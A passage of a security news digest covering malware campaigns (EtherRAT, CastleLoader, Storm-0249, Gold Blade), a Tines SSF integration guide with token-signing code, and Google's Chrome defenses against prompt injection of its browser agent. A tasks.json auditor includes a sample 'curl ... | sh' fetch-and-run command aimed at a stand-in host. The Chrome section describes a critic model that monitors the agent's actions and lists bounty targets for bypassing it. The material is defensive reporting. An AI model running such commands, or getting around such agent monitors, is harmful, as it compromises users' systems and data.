“What makes this implementation unique is its use of consensus voting across nine public Ethereum remote procedure call (RPC) endpoints,” Sysdig said. “EtherRAT queries all nine endpoints in parallel, collects responses, and selects the URL returned by the majority.” “This consensus mechanism protects against several attack scenarios: a single compromised RPC endpoint cannot redirect bots to a sinkhole, and researchers cannot poison C2 resolution by operating a rogue RPC node.” It’s worth noting that a similar implementation was previously observed in two npm packages named colortoolsv2 and mimelib2 that were found to deliver downloader malware on developer systems. Once EtherRAT establishes contact with the C2 server, it enters a polling loop that executes every 500 milliseconds, interpreting any response that’s longer than 10 characters as JavaScript code to be run on the infected machine. Persistence is accomplished by using five different methods:
- Systemd user service
- XDG autostart entry
- Cron jobs
- .bashrc injection
- Profile injection
By using multiple mechanisms, the threat actors can ensure the malware runs even after a system reboot and grants them continued access to the infected systems.
Another sign that points to the malware’s sophistication is the self-update ability that overwrites itself with the new code received from the C2 server after sending its own source code to an API endpoint. It then launches a new process with the updated payload. What’s notable here is that the C2 returns a functionally identical but differently obfuscated version, thereby possibly allowing it to bypass static signature-based detection. In addition to the use of EtherHiding, the links to Contagious Interview stem from overlaps between the encrypted loader pattern used in EtherRAT and a known JavaScript information stealer and downloader named BeaverTail.
“EtherRAT represents a significant evolution in React2Shell exploitation, moving beyond opportunistic cryptomining and credential theft toward persistent, stealthy access designed for long-term operations,” Sysdig said. “Whether this represents North Korean actors pivoting to new exploitation vectors or sophisticated technique borrowing by another actor, the result is the same: defenders face a challenging new implant that resists traditional detection and takedown methods.”
Contagious Interview Shifts from npm to VS Code
The disclosure comes as OpenSourceMalware revealed details of a new Contagious Interview variant that urges victims to clone a malicious repository on GitHub, GitLab, or Bitbucket as part of a programming assignment, and launch the project in Microsoft Visual Studio Code (VS Code). This results in the execution of a VS Code tasks.json file due to it being configured with runOptions.runOn: ‘folderOpen,’ causing it to auto-run as soon as the project is opened. The file is engineered to download a loader script using curl or wget based on the operating system of the compromised host.
In the case of Linux, the next stage is a shell script that downloads and runs another shell script named “vscode-bootstrap.sh,” which then fetches two more files, “package.json” and “env-setup.js,” the latter of which serves as a launchpad for BeaverTail and InvisibleFerret. OpenSourceMalware said it identified 13 different versions of this campaign spread across 27 different GitHub users and 11 different versions of BeaverTail. The earliest repository (“github[.]com/MentarisHub121/TokenPresaleApp”) dates back to April 22, 2025, and the most recent version (“github[.]com/eferos93/test4”) was created on December 1, 2025. “DPRK threat actors have flocked to Vercel, and are now using it almost exclusively,” the OpenSourceMalware team said.
“We don’t know why, but Contagious Interview has stopped using Fly.io, Platform.sh, Render and other hosting providers.”
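The auto-run task configuration described above can be checked before a cloned assignment repository is opened in VS Code. The following is an added example, not code from OpenSourceMalware or the article: it audits the text of a `.vscode/tasks.json` for tasks with `runOptions.runOn` set to `folderOpen`. The function names, the pipe-to-interpreter and hidden-terminal heuristics, and the constructed sample file are assumptions.

```javascript
// Added example: audit a .vscode/tasks.json for tasks that run on folder open.
// tasks.json is JSON-with-comments, so comments and trailing commas are removed
// first. Each regex matches string literals before anything else, so "//" inside
// a URL or command string is never mistaken for a comment.
const COMMENTS = /"(?:\\.|[^"\\])*"|\/\/[^\n]*|\/\*[\s\S]*?\*\//g;
const TRAILING_COMMAS = /"(?:\\.|[^"\\])*"|,(?=\s*[}\]])/g;
const keepStrings = (match) => (match[0] === '"' ? match : '');

function stripJsonc(text) {
  return text.replace(COMMENTS, keepStrings).replace(TRAILING_COMMAS, keepStrings);
}

// curl and wget are the downloaders named in the article.
const FETCHER = /\b(?:curl|wget)\b/i;
// Assumption: piping into an interpreter is treated as an extra warning sign.
const PIPE_TO_INTERPRETER = /\|\s*(?:(?:ba|z|da)?sh|python3?|node)\b/i;

// A task can carry a base command plus per-OS overrides (windows/linux/osx).
// Commands and args may be plain strings or { value, quoting } objects.
function commandLines(task) {
  const text = (v) => (typeof v === 'string' ? v : v && typeof v.value === 'string' ? v.value : '');
  const lines = [];
  for (const scope of [task, task.windows, task.linux, task.osx]) {
    if (!scope || typeof scope !== 'object') continue;
    const args = Array.isArray(scope.args) ? scope.args.map(text) : [];
    const line = [text(scope.command), ...args].filter(Boolean).join(' ');
    if (line) lines.push(line);
  }
  return lines;
}

// Returns one finding per task that VS Code would start without user action.
function auditTasksJson(source) {
  const doc = JSON.parse(stripJsonc(source));
  const findings = [];
  for (const task of Array.isArray(doc.tasks) ? doc.tasks : []) {
    if (task?.runOptions?.runOn !== 'folderOpen') continue;
    const commands = commandLines(task);
    const reasons = ['runs automatically on folder open'];
    if (commands.some((l) => FETCHER.test(l))) reasons.push('downloads with curl/wget');
    if (commands.some((l) => PIPE_TO_INTERPRETER.test(l))) reasons.push('pipes output into an interpreter');
    if (['never', 'silent'].includes(task.presentation?.reveal)) reasons.push('terminal panel hidden');
    findings.push({ label: task.label ?? '(unlabelled)', reasons, commands });
  }
  return findings;
}

// Constructed sample, not taken from any real repository.
const SAMPLE_TASKS_JSON = `{
  // constructed sample for the audit function
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    {
      "label": "env-check",
      "type": "shell",
      "command": "echo ok",
      "linux":   { "command": "curl -fsSL https://loader.example.invalid/l.sh | sh" },
      "windows": { "command": "curl", "args": ["-o", "l.cmd", "https://loader.example.invalid/l.cmd"] },
      "presentation": { "reveal": "never" },
      "runOptions": { "runOn": "folderOpen" },
    },
  ]
}`;

for (const f of auditTasksJson(SAMPLE_TASKS_JSON)) {
  console.log(`[!] task "${f.label}": ${f.reasons.join('; ')}`);
  for (const c of f.commands) console.log(`      ${c}`);
}
```

Pass the function the contents of `.vscode/tasks.json` from a freshly cloned repository before opening the folder in the editor.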
Four Threat Clusters Using CastleLoader as GrayBravo Expands Its Malware Service Infrastructure
Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader, strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model. The threat actor behind CastleLoader has been assigned the name GrayBravo by Recorded Future’s Insikt Group, which was previously tracking it as TAG-150. The malware first emerged in early 2025. GrayBravo is “characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure,” the Mastercard-owned company said in an analysis published today.
Some of the notable tools in the threat actor’s toolset include a remote access trojan called CastleRAT and a malware framework referred to as CastleBot, which comprises three components: a shellcode stager/downloader, a loader, and a core backdoor. The CastleBot loader is responsible for injecting the core module, which is equipped to contact its command-and-control (C2) server to retrieve tasks that enable it to download and execute DLL, EXE, and PE (portable executable) payloads. Some of the malware families distributed via this framework are DeerStealer, RedLine Stealer, StealC Stealer, NetSupport RAT, SectopRAT, MonsterV2, WARMCOOKIE, and even other loaders like Hijack Loader. Recorded Future’s latest analysis has uncovered four clusters of activity, each operating with distinct tactics:
- Cluster 1 (TAG-160), which targets the logistics sector using phishing and ClickFix techniques to distribute CastleLoader (Active since at least March 2025)
- Cluster 2 (TAG-161), which uses Booking.com-themed ClickFix campaigns to distribute CastleLoader and Matanbuchus 3.0 (Active since at least June 2025)
- Cluster 3, which uses infrastructure impersonating Booking.com in conjunction with ClickFix and Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader (Active since at least March 2025)
- Cluster 4, which uses malvertising and fake software update lures masquerading as Zabbix and RVTools to distribute CastleLoader and NetSupport RAT (Active since at least April 2025)
GrayBravo has been found to leverage a multi-tiered infrastructure to support its operations.
This includes Tier 1 victim-facing C2 servers associated with malware families like CastleLoader, CastleRAT, SectopRAT, and WARMCOOKIE, as well as multiple VPS servers that likely operate as backups. The attacks mounted by TAG-160 are also notable for using fraudulent or compromised accounts created on freight-matching platforms like DAT Freight & Analytics and Loadlink Technologies to enhance the credibility of its phishing campaigns. The activity, Recorded Future added, illustrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. It’s been assessed with low confidence that the activity could be related to another unattributed cluster that targeted transportation and logistics companies in North America last year to distribute various malware families.
“GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware,” Recorded Future said. “This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective.” The development comes as Blackpoint detailed a Python dropper-based attack chain that uses ClickFix techniques to distribute the CastleLoader, shifting from earlier campaigns that used a ZIP archive containing AutoIt scripts. “In this case, the ClickFix command downloaded a small archive and staged its contents inside the user’s AppData directory before invoking a bundled copy of pythonw.exe to execute one of the extracted files,” security researcher Sam Decker said. “That script served as a simple Python stager whose only job was to rebuild and execute a CastleLoader payload.”
Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading
The threat actor known as Storm-0249 is likely shifting from its role as an initial access broker to adopt a combination of more advanced tactics like domain spoofing, DLL side-loading, and fileless PowerShell execution to facilitate ransomware attacks. “These methods allow them to bypass defenses, infiltrate networks, maintain persistence, and operate undetected, raising serious concerns for security teams,” ReliaQuest said in a report shared with The Hacker News. Storm-0249 is the moniker assigned by Microsoft to an initial access broker that has sold footholds into organizations to other cybercrime groups, including ransomware and extortion actors like Storm-0501. It was first highlighted by the tech giant in September 2024.
Then, earlier this year, Microsoft also revealed details of a phishing campaign mounted by the threat actor that used tax-related themes to target users in the U.S. ahead of the tax filing season and infect them with Latrodectus and the BruteRatel C4 (BRc4) post-exploitation framework. The end goal of these infections is to obtain persistent access to various enterprise networks and monetize them by selling them to ransomware gangs, providing them with a ready supply of targets, and accelerating the pace of such attacks. The latest findings from ReliaQuest demonstrate a tactical shift, where Storm-0249 has resorted to using the infamous ClickFix social engineering tactic to trick prospective targets into running malicious commands via the Windows Run dialog under the pretext of resolving a technical issue.
In this case, the command copied and executed leverages the legitimate “curl.exe” to fetch a PowerShell script from a URL that mimics a Microsoft domain to give victims a false sense of trust (“sgcipl[.]com/us.microsoft.com/bdo/”) and execute it in a fileless manner via PowerShell. This, in turn, results in the execution of a malicious MSI package with SYSTEM privileges, which drops a trojanized DLL associated with SentinelOne’s endpoint security solution (“SentinelAgentCore.dll”) into the user’s AppData folder along with the legitimate “SentinelAgentWorker.exe” executable. In doing so, the idea is to sideload the rogue DLL when the “SentinelAgentWorker.exe” process is launched, thereby allowing the activity to stay undetected. The DLL then establishes encrypted communication with a command-and-control (C2) server.
Storm-0249 has also been observed making use of legitimate Windows administrative utilities like reg.exe and findstr.exe to extract unique system identifiers like MachineGuid to lay the groundwork for follow-on ransomware attacks. The use of living-off-the-land (LotL) tactics, coupled with the fact that these commands are run under the trusted “SentinelAgentWorker.exe” process, means the activity is unlikely to raise any red flags. The findings indicate a departure from mass phishing campaigns to precision attacks that weaponize the trust associated with signed processes for added stealth. “This isn’t just generic reconnaissance – it’s preparation for ransomware affiliates,” ReliaQuest said.
“Ransomware groups like LockBit and ALPHV use MachineGuid to bind encryption keys to individual victim systems.” “By tying encryption keys to MachineGuid, attackers ensure that even if defenders capture the ransomware binary or attempt to reverse-engineer the encryption algorithm, they cannot decrypt files without the attacker-controlled key.”
How to Streamline Zero Trust Using the Shared Signals Framework
Zero Trust helps organizations shrink their attack surface and respond to threats faster, but many still struggle to implement it because their security tools don’t share signals reliably. 88% of organizations admit they’ve suffered significant challenges in trying to implement such approaches, according to Accenture. When products can’t communicate, real-time access decisions break down. The Shared Signals Framework (SSF) aims to fix this with a standardized way to exchange security events.
Yet adoption is uneven. For example, Kolide Device Trust doesn’t currently support SSF. Scott Bean, Senior IAM and Security Engineer at MongoDB, proposed a way to solve the problem, giving teams an easy and intuitive way to operationalize SSF across their environment. In this guide, we’ll share an overview of the workflow, plus step-by-step instructions for getting it up and running.
The problem – IAM tools don’t support SSF
A core requirement of Zero Trust is continuous, reliable signals about user and device posture. But many tools don’t support SSF for Continuous Access Evaluation Protocol (CAEP), making it hard to share or act on these signals. Teams often face three challenges:
- Tools lack native SSF support
- Signals require enrichment or correlation
- Managing SSF endpoints and token handling adds overhead
Without this interoperability, organizations struggle to apply consistent policies — and in cases like Kolide Device Trust, critical device events never reach systems like Okta.
The solution – a SSF transmitter that turns Kolide issues into CAEP events
Because SSF is built on HTTPS requests, the OpenID standard works with Tines’ HTTP Action.
Scott developed a new workflow integrating Kolide Device Trust with Tines, enabling it to send SSF signals to Okta. If a device is non-compliant, Kolide sends a message to the workflow via webhook. Tines enriches the signal, makes sure it can be linked to a user, builds a Security Event Token (SET), and then sends it to Okta. In this way, Tines acts as the connective tissue that makes SSF work across the distributed IT environment, even if individual tools don’t natively support the standard.
Tines can:
- Receive signals from Kolide (and tools like it) via webhook when a device becomes non-compliant
- Enrich and correlate those signals (e.g., map device to user)
- Generate and sign SETs that meet the SSF specification
- Deliver them to Okta (and other identity providers) to enforce Zero Trust
- Host required SSF metadata endpoints using API path prefixes, giving consuming systems a standards-compliant place to fetch keys and decrypt tokens
All of which makes Zero Trust enforcement faster, more reliable, and much easier to operationalize. IT teams are empowered with continuous, real-time risk assessment of devices, faster response to threats, and more flexible policy orchestration. And end users get the benefit of automated remediation, which helps to optimize productivity and minimize IT intervention. If you want to go deeper into identity modernization, the Tines IAM guide explores how teams are unifying device trust, access decisions, and least-privilege enforcement with automation.
Scott’s workflow is one of several real-world patterns inside.
Workflow overview
Required tools:
- Tines – workflow orchestration and AI platform
- Kolide – device trust and posture monitoring
- Okta – identity platform receiving CAEP events
Required credentials:
- Tines API Key - Team Scoped with the Editor role
- Kolide API Key - Read Only
- Kolide Webhook Signing Secret
Required resources:
- Okta domain, such as example.okta.com, example.oktapreview.com, or a branded domain.
How it works:
The workflow creates a proof-of-concept SSF transmitter that can be registered with Okta and sends device compliance change CAEP events (sent as SETs), based on issues generated in Kolide. There are three elements:
1. Generate and store SET signing keys (SETs are signed JSON Web Tokens):
- Creates an RSA key pair and converts it to JWK format.
- Publishes the public key for SSF receivers to validate SET signatures.
- Stores the private JWK keyset as a Tines secret.
2. Expose SSF transmitter API
SSF receivers (like Okta) need:
- a .well-known/sse-configuration endpoint describing the transmitter
- a JWK endpoint exposing the public key used to verify SET signatures
- a webhook trigger acts as the SSF API surface
- logic returns the .well-known config
- logic returns the JWKs
Once this is live, teams can register a new SSF receiver in Okta under:
Security → Device Integrations → Receive shared signals
And create a new stream using the API’s URL and the new .well-known endpoint
3. Create, sign and send SETs from Kolide events
- Receives Kolide issue events via webhook and validates them using the signing secret.
- Fetches device and user metadata from Kolide.
- Builds a SET for a Device Compliance Change CAEP event.
- Signs the SET with the stored private key using the JWT_SIGN formula.
- Sends the signed token to Okta’s security-events endpoint.
This delivers real-time device-compliance updates to Okta so access policies can respond immediately.
Configuring the workflow — a step-by-step guide
You can build and run this entire workflow using Tines Community Edition.
1. Log into Tines or create a new account.
2. Navigate to the pre-built workflow in the library. Select import. This should take you straight to your new pre-built workflow.
3. Gather the required credentials
- Tines API Key (team-scoped with Editor role)
- Kolide API Key (read-only)
- Kolide Webhook Signing Secret
These ensure authenticated calls to Kolide and secure webhook validation.
4. Collect your required resources
You’ll need an Okta tenant domain, such as:
- example.oktapreview.com
- example.okta.com
- or your custom Okta brand domain
This domain is used when sending signed SETs to Okta’s security-events endpoint.
Note: In the example provided, Scott set up as a push rather than a poll provider as tokens are sent based off of inbound webhooks, so there’s no need to store state.
5. Generate your SET signing keys
- Use the Generate JWK keyset action to create RSA keys
- Convert both public and private keys to JWK format (two event transforms)
- Store the resulting keyset using a Tines secret
This is required before Okta will accept and verify your SETs.
6. Publish the SSF transmitter API
The SSF API webhook contains two branches:
.well-known endpoint
- Trigger: well-known
- Event transform: returns the SSF configuration declaring the transmitter’s capabilities
JWKS endpoint
- Trigger: JWKs
- Event transform: returns the public JWKs so Okta can verify signatures
Once live, Okta can register this transmitter as a shared signals sender.
7. Connect Kolide and process device issues
The Kolide integration flow follows these steps:
- Webhook: Kolide webhook – receives issue opened/resolved events
- Get device details – fetches metadata for the device involved
- Device has a user – branching logic to confirm a user is associated
- Get user details – look up user metadata for the CAEP payload
Depending on whether the issue is new or resolved:
- Build SET – construct the CAEP device_compliance_change event
- Sign SET – use the RSA private key stored earlier to produce an SSF-compliant SET
- Send SET – send the final signed token to Okta’s security-events endpoint
As soon as Okta receives and verifies the SET, the associated user risk level updates.
Bringing it all together
SSF exists to help security tools speak the same language, delivering continuous insight into risk and device posture. But when key tools don’t support the standard, gaps open up, and access policies lag behind real-world changes. Tines bridges these gaps by enabling new intelligent workflows.
They ensure that even tools that don’t support SSF can send information in the same standardized way. By using Tines to generate, sign, and deliver compliance signals in real time, you get the benefits of SSF even when the source tool wasn’t built for it. If you’d like to try this workflow yourself, you can spin it up in minutes with a free Tines account. And if you want to see how device posture fits into a broader identity strategy, this guide to modern IAM workflows offers practical patterns and real-world workflows like Scott’s you can start building on today.
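The key-generation, SET-building, signing and receiver-side verification steps of the workflow above are shown here as an added Node.js example using only the built-in crypto module; it is not Scott's Tines workflow and does not use the Tines JWT_SIGN formula. The issuer and audience URLs, the subject layout (user email plus opaque device id), the RFC 7638 thumbprint used as `kid`, and all function names are assumptions.

```javascript
// Added example: sign a CAEP device-compliance-change SET with RS256 and verify
// it the way a receiver would, using the transmitter's published JWKS.
const nodeCrypto = require('node:crypto');

const CAEP_DEVICE_COMPLIANCE =
  'https://schemas.openid.net/secevent/caep/event-type/device-compliance-change';

const b64url = (value) => Buffer.from(value).toString('base64url');

// Key step: RSA key pair, public half exported as a JWK for the JWKS endpoint.
// Assumption: kid is the RFC 7638 thumbprint (SHA-256 over e, kty, n in that order).
function generateSigningKey() {
  const { publicKey, privateKey } = nodeCrypto.generateKeyPairSync('rsa', { modulusLength: 2048 });
  const jwk = publicKey.export({ format: 'jwk' });
  const canonical = JSON.stringify({ e: jwk.e, kty: jwk.kty, n: jwk.n });
  const kid = nodeCrypto.createHash('sha256').update(canonical).digest('base64url');
  return { privateKey, kid, jwks: { keys: [{ ...jwk, kid, use: 'sig', alg: 'RS256' }] } };
}

// Build step: SET claims for one device whose compliance status flipped.
function buildDeviceComplianceSet({ issuer, audience, userEmail, deviceId, compliant, now = Date.now() }) {
  const status = (ok) => (ok ? 'compliant' : 'not-compliant');
  const iat = Math.floor(now / 1000);
  return {
    iss: issuer,
    aud: audience,
    jti: nodeCrypto.randomUUID(), // unique per token so receivers can drop replays
    iat,
    events: {
      [CAEP_DEVICE_COMPLIANCE]: {
        // Assumed subject layout: user by email, device by opaque identifier.
        subject: {
          user: { format: 'email', email: userEmail },
          device: { format: 'opaque', id: deviceId },
        },
        previous_status: status(!compliant),
        current_status: status(compliant),
        event_timestamp: iat,
      },
    },
  };
}

// Sign step: compact JWS with typ "secevent+jwt" (RSASSA-PKCS1-v1_5 + SHA-256).
function signSet(claims, privateKey, kid) {
  const header = { alg: 'RS256', typ: 'secevent+jwt', kid };
  const signingInput = `${b64url(JSON.stringify(header))}.${b64url(JSON.stringify(claims))}`;
  const signature = nodeCrypto.sign('sha256', Buffer.from(signingInput), privateKey);
  return `${signingInput}.${signature.toString('base64url')}`;
}

// Receiver side: pin the algorithm, pick the key by kid, check signature, iss and aud.
function verifySet(token, jwks, { issuer, audience }) {
  const parts = token.split('.');
  if (parts.length !== 3) throw new Error('malformed SET');
  const [h, p, s] = parts;
  const header = JSON.parse(Buffer.from(h, 'base64url').toString('utf8'));
  if (header.alg !== 'RS256') throw new Error('unexpected alg');
  if (header.typ !== 'secevent+jwt') throw new Error('unexpected typ');
  const jwk = jwks.keys.find((k) => k.kid === header.kid);
  if (!jwk) throw new Error('unknown kid');
  const key = nodeCrypto.createPublicKey({ key: { kty: jwk.kty, n: jwk.n, e: jwk.e }, format: 'jwk' });
  const valid = nodeCrypto.verify('sha256', Buffer.from(`${h}.${p}`), key, Buffer.from(s, 'base64url'));
  if (!valid) throw new Error('bad signature');
  const claims = JSON.parse(Buffer.from(p, 'base64url').toString('utf8'));
  if (claims.iss !== issuer || claims.aud !== audience) throw new Error('iss/aud mismatch');
  return claims;
}

// Constructed values for a stand-alone run; none come from a real tenant.
const demoKey = generateSigningKey();
const demoEndpoints = { issuer: 'https://transmitter.example', audience: 'https://example.okta.com' };
const demoToken = signSet(
  buildDeviceComplianceSet({ ...demoEndpoints, userEmail: 'user@example.com', deviceId: 'device-123', compliant: false }),
  demoKey.privateKey,
  demoKey.kid
);
const demoEvent = verifySet(demoToken, demoKey.jwks, demoEndpoints).events[CAEP_DEVICE_COMPLIANCE];
console.log(`verified SET, device is now ${demoEvent.current_status}`);
```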
This article is a contributed piece from one of our valued partners.
Google Adds Layered Defenses to Chrome to Block Indirect Prompt Injection Threats
Google on Monday announced a set of new security features in Chrome, following the company’s addition of agentic artificial intelligence (AI) capabilities to the web browser. To that end, the tech giant said it has implemented layered defenses to make it harder for bad actors to exploit indirect prompt injections that arise as a result of exposure to untrusted web content and inflict harm. Chief among the features is a User Alignment Critic, which uses a second model to independently evaluate the agent’s actions in a manner that’s isolated from malicious prompts. This approach complements Google’s existing techniques, like spotlighting, which instruct the model to stick to user and system instructions rather than abiding by what’s embedded in a web page.
“The User Alignment Critic runs after the planning is complete to double-check each proposed action,” Google said. “Its primary focus is task alignment: determining whether the proposed action serves the user’s stated goal. If the action is misaligned, the Alignment Critic will veto it.” The component is designed to view only metadata about the proposed action and is prevented from accessing any untrustworthy web content, thereby ensuring that it is not poisoned through malicious prompts that may be included in a website. With the User Alignment Critic, the idea is to provide safeguards against any malicious attempts to exfiltrate data or hijack the intended goals to carry out the attacker’s bidding.
“When an action is rejected, the Critic provides feedback to the planning model to re-formulate its plan, and the planner can return control to the user if there are repeated failures,” Nathan Parker from the Chrome security team said. Google is also enforcing what’s called Agent Origin Sets to ensure that the agent only has access to data from origins that are relevant to the task at hand or data sources the user has opted to share with the agent. This aims to address site isolation bypasses where a compromised agent can interact with arbitrary sites and enable it to exfiltrate data from logged-in sites. This is implemented by means of a gating function that determines which origins are related to the task and categorizes them into two sets:
- Read-only origins, from which Google’s Gemini AI model is permitted to consume content
- Read-writable origins, to which the agent can type or click on in addition to reading from
“This delineation enforces that only data from a limited set of origins is available to the agent, and this data can only be passed on to the writable origins,” Google explained.
“This bounds the threat vector of cross-origin data leaks.” Similar to the User Alignment Critic, the gating function is not exposed to untrusted web content. The planner is also required to obtain the gating function’s approval before adding new origins, although it can use context from the web pages a user has explicitly shared in a session. Another key pillar underpinning the new security architecture relates to transparency and user control, allowing the agent to create a work log for user observability and request their explicit approval before navigating to sensitive sites, such as banking and healthcare portals, permitting sign-ins via Google Password Manager, or completing web actions like purchases, payments, or sending messages. Lastly, the agent also checks each page for indirect prompt injections and operates alongside Safe Browsing and on-device scam detection to block potentially suspicious content.
“This prompt-injection classifier runs in parallel to the planning model’s inference, and will prevent actions from being taken based on content that the classifier determined has intentionally targeted the model to do something unaligned with the user’s goal,” Google said. To further incentivize research and poke holes in the system, the company said it will pay up to $20,000 for demonstrations that result in a breach of the security boundaries. These include indirect prompt injections that allow an attacker to:
- Carry out rogue actions without confirmation
- Exfiltrate sensitive data without an effective opportunity for user approval
- Bypass a mitigation that should have ideally prevented the attack from succeeding in the first place
“By extending some core principles like origin-isolation and layered defenses, and introducing a trusted-model architecture, we’re building a secure foundation for Gemini’s agentic experiences in Chrome,” Google said. “We remain committed to continuous innovation and collaboration with the security community to ensure Chrome users can explore this new era of the web safely.” The announcement follows research from Gartner that called on enterprises to block the use of agentic AI browsers until the associated risks, such as indirect prompt injections, erroneous agent actions, and data loss, can be appropriately managed.
The research also warns of a possible scenario where employees “might be tempted to use AI browsers and automate certain tasks that are mandatory, repetitive, and less interesting.” This could cover cases where an individual dodges mandatory cybersecurity training by instructing the AI browser to complete it on their behalf. “Agentic browsers, or what many call AI browsers, have the potential to transform how users interact with websites and automate transactions while introducing critical cybersecurity risks,” the advisory firm said. “CISOs must block all AI browsers in the foreseeable future to minimize risk exposure.” The development comes as the U.S. National Cyber Security Centre (NCSC) said that large language models (LLMs) may suffer from a persistent class of vulnerability known as prompt injection and that the problem can never be resolved in its entirety.
“Current large language models (LLMs) simply do not enforce a security boundary between instructions and data inside a prompt,” said David C, NCSC technical director for Platforms Research. “Design protections need to therefore focus more on deterministic (non-LLM) safeguards that constrain the actions of the system, rather than just attempting to prevent malicious content reaching the LLM.”
STAC6565 Targets Canada in 80% of Attacks as Gold Blade Deploys QWCrypt Ransomware
Canadian organizations have emerged as the focus of a targeted cyber campaign orchestrated by a threat activity cluster known as STAC6565. Cybersecurity company Sophos said it investigated almost 40 intrusions linked to the threat actor between February 2024 and August 2025. The campaign is assessed with high confidence to share overlaps with a hacking group known as Gold Blade, which is also tracked under the names Earth Kapre, RedCurl, and Red Wolf. The financially motivated threat actor is believed to be active since late 2018, initially targeting entities in Russia, before expanding its focus to entities in Canada, Germany, Norway, Russia, Slovenia, Ukraine, the U.K., and the U.S.
The group has a history of using phishing emails to conduct commercial espionage. However, recent attack waves have found RedCurl to have engaged in ransomware attacks using a bespoke malware strain dubbed QWCrypt. One of the notable tools in the threat actor’s arsenal is RedLoader, which sends information about the infected host to a command-and-control (C2) server and executes PowerShell scripts to collect details related to the compromised Active Directory (AD) environment. “This campaign reflects an unusually narrow geographic focus for the group, with almost 80% of the attacks targeting Canadian organizations,” Sophos researcher Morgan Demboski said.
“Once focused primarily on cyber espionage, Gold Blade has evolved its activity into a hybrid operation that blends data theft with selective ransomware deployment via a custom locker named QWCrypt.” Other prominent targets include the U.S., Australia, and the U.K., with services, manufacturing, retail, technology, non-governmental organizations, and transportation sectors hit the hardest during the time period. The group is said to be operating under a “hack-for-hire” model, carrying out tailored intrusions on behalf of clients, while deploying ransomware on the side to monetize the intrusions. Although a 2020 report from Group-IB raised the possibility of it being a Russian-speaking group, there are currently no indications to confirm or deny this assessment. Describing RedCurl as a “professionalized operation,” Sophos said the threat actor stands apart from other cybercriminal groups owing to its ability to refine and evolve its tradecraft, as well as mount discreet extortion attacks.
That said, there is no evidence to suggest it’s state-sponsored or politically motivated. The cybersecurity company also pointed out that the operational tempo is marked by periods of no activity, followed by sudden spikes in attacks using improved tactics, indicating that the hacking group could be using the downtime to refresh its toolset. STAC6565 begins with spear-phishing emails targeting human resources (HR) personnel to trick them into opening malicious documents disguised as resumes or cover letters. Since at least November 2024, the activity has leveraged legitimate job search platforms like Indeed, JazzHR, and ADP WorkforceNow to upload the weaponized resumes as part of a job application process.
“As recruitment platforms enable HR staff to review all incoming resumes, hosting payloads on these platforms and delivering them via disposable email domains not only increases the likelihood that the documents will be opened but also evades detection by email-based protections,” Demboski explained. In one incident, a fake resume uploaded to Indeed has been found to redirect users to a booby-trapped URL that ultimately led to the deployment of QWCrypt ransomware by means of a RedLoader chain. At least three different RedLoader delivery sequences have been observed in September 2024, March/April 2025, and July 2025. Some aspects of the delivery chains were previously detailed by Huntress, eSentire, and Bitdefender.
The major change observed in July 2025 concerns the use of a ZIP archive that’s dropped by the bogus resume. Present within the archive is a Windows shortcut (LNK) that impersonates a PDF. The LNK file uses “rundll32.exe” to fetch a renamed version of “ADNotificationManager.exe” from a WebDAV server hosted behind a Cloudflare Workers domain. The attack then launches the legitimate Adobe executable to sideload the RedLoader DLL (named “srvcli.dll” or “netutils.dll”) from the same WebDAV path.
The DLL proceeds to connect to an external server to download and execute the second-stage payload, a standalone binary that’s responsible for connecting to a different server and retrieving the third-stage standalone executable alongside a malicious DAT file and a renamed 7-Zip file. Both stages rely on Microsoft’s Program Compatibility Assistant (“pcalua.exe”) for payload execution, an approach seen in previous campaigns as well. The only difference is that the format of the payloads transitioned in April 2025 to EXEs instead of DLLs. “The payload parses the malicious .dat file and checks internet connectivity.
It then connects to another attacker-controlled C2 server to create and run a .bat script that automates system discovery,” Sophos said. “The script unpacks Sysinternals AD Explorer and runs commands to gather details such as host information, disks, processes, and installed antivirus (AV) products.” The results of the execution are packaged into an encrypted, password-protected 7-Zip archive and transferred to a WebDAV server controlled by the attacker. RedCurl has also been observed using RPivot, an open-source reverse proxy, and Chisel SOCKS5 for C2 communications. Another tool used in the attacks is a customized version of the Terminator tool that leverages a signed Zemana AntiMalware driver to kill antivirus-related processes via what’s called a Bring Your Own Vulnerable Driver (BYOVD) attack.
In at least one case in April 2025, the threat actors renamed both components before distributing them via SMB shares to all servers in the victim environment. Sophos also noted that a majority of these attacks were detected and mitigated before the installation of QWCrypt. However, three of the attacks – one in April and two in July 2025 – led to a successful deployment. “In the April incident, the threat actors manually browsed and collected sensitive files, then paused activity for over five days before deploying the locker,” it added.
“This delay may suggest the attackers turned to ransomware after trying to monetize the data or failing to secure a buyer.” The QWCrypt deployment scripts are tailored to the target environment, often containing a victim-specific ID in the file names. The script, once launched, checks whether the Terminator service is running before taking steps to disable recovery and execute the ransomware on endpoint devices across the network, including the organization’s hypervisors. In the last stage, the script runs a cleanup batch script to delete existing shadow copies and every PowerShell console history file to inhibit forensic recovery. “Gold Blade’s abuse of recruitment platforms, cycles of dormancy and bursts, and continual refinement of delivery methods demonstrate a level of operational maturity not typically associated with financially motivated actors,” Sophos said.
